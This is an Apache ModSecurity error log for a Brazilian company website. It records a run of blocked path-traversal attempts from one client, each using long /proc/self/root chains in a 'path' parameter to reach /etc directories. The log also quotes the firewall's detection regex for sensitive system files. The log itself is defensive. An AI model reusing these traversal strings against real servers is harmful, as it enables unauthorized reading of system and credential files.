[Fri Mar 20 09:48:00.948205 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:38734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CADJ3M9BSuKP7CAY3XQAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:03.828210 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:38736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CAta6ubjKNq_cu4bv1QAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:06.718971 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:38746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CBta6ubjKNq_cu4bv3wAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:09.190299 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.243.128:38758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CCTJ3M9BSuKP7CAY3XwAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:10.479104 2026] [:error] [pid 11642:tid 140411599251200] [client 74.7.243.128:37880] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CCrninkcc-iUj5Ap0DAAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:13.711198 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.243.128:37890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CDfXLqtnMIWvjpaKwnQAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:17.171665 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.243.128:37896] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CEfXLqtnMIWvjpaKwpwAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:18.483078 2026] [:error] [pid 11167:tid 140411565680384] [client 74.7.243.128:37912] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CEvHIg5MgXLBnicMN7wAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:20.606242 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:58886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CE9a6ubjKNq_cu4bv4gAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:22.226961 2026] [:error] [pid 11167:tid 140411708356352] [client 74.7.243.128:58900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CFvHIg5MgXLBnicMN9gAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:23.570195 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.243.128:58902] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CF_HIg5MgXLBnicMN-gAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:26.045426 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.243.128:58910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CGvHIg5MgXLBnicMOAAAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:27.915269 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.243.128:58912] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CG7ninkcc-iUj5Ap0EwAAA4I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:29.192579 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:58922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CHRCii7xarUs8iHZ-QwAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:43.957565 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.243.128:34288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CKgF0L0L-SsrnPo5_IgAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:48.192048 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:44022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CLTJ3M9BSuKP7CAY3dgAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:49.971223 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.243.128:37786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CMTJ3M9BSuKP7CAY3egAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:48:54.705803 2026] [mime_magic:error] [pid 9818:tid 140411741927168] (70014)End of file found: [client 57.141.18.86:52696] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:49:00.115503 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.228.61:60604] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1CPPqxLDW4GITHUkT_twAAARQ"]
[Fri Mar 20 09:49:04.712512 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:37800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CQPXLqtnMIWvjpaKw0gAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:49:06.772331 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:56538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CQta6ubjKNq_cu4bwDAAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:49:08.706140 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:56550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CROoXxyEfFpUF8f-XHwAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:49:14.322381 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:47094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CSta6ubjKNq_cu4bwGQAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:49:18.790208 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:47098] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CTuoXxyEfFpUF8f-XKQAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
